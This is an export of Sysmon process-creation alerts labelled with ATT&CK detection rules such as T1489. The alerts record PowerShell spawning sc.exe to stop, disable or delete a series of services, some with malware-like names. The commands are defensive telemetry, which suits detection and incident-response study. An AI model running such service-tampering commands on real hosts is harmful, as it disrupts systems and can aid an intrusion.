+FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config aspnet_staters Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.647160200Z"",""eventRecordID"":""2434"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.644\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010173c1e00}\r\nProcessId: 6724\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.644"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010173c1e00}"",""processId"":""6724"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config aspnet_staters Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.886",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.609 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010863a1e00} +ProcessId: 3384 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHelpSvcs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.612612500Z"",""eventRecordID"":""2432"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.609\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010863a1e00}\r\nProcessId: 3384\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHelpSvcs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.609"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010863a1e00}"",""processId"":""3384"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHelpSvcs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.778",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.558 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d2371e00} +ProcessId: 5680 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.563459200Z"",""eventRecordID"":""2429"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.558\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010d2371e00}\r\nProcessId: 5680\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.558"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010d2371e00}"",""processId"":""5680"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.751",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.517 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-00101c361e00} +ProcessId: 3880 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.519851000Z"",""eventRecordID"":""2427"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.517\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-00101c361e00}\r\nProcessId: 3880\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.517"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-00101c361e00}"",""processId"":""3880"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.728",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.504 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-001046351e00} +ProcessId: 7228 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.506709100Z"",""eventRecordID"":""2426"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.504\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-001046351e00}\r\nProcessId: 7228\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.504"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-001046351e00}"",""processId"":""7228"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.683",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.425 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010b6321e00} +ProcessId: 5700 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:02.428809100Z"",""eventRecordID"":""2423"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:02.425\r\nProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010b6321e00}\r\nProcessId: 5700\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:02.425"",""processGuid"":""{df9fc3d3-b37a-5ecf-0000-0010b6321e00}"",""processId"":""5700"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:30.614",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:02.354 +ProcessGuid: {df9fc3d3-b37a-5ecf-0000-0010bb2f1e00} +ProcessId: 6072 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 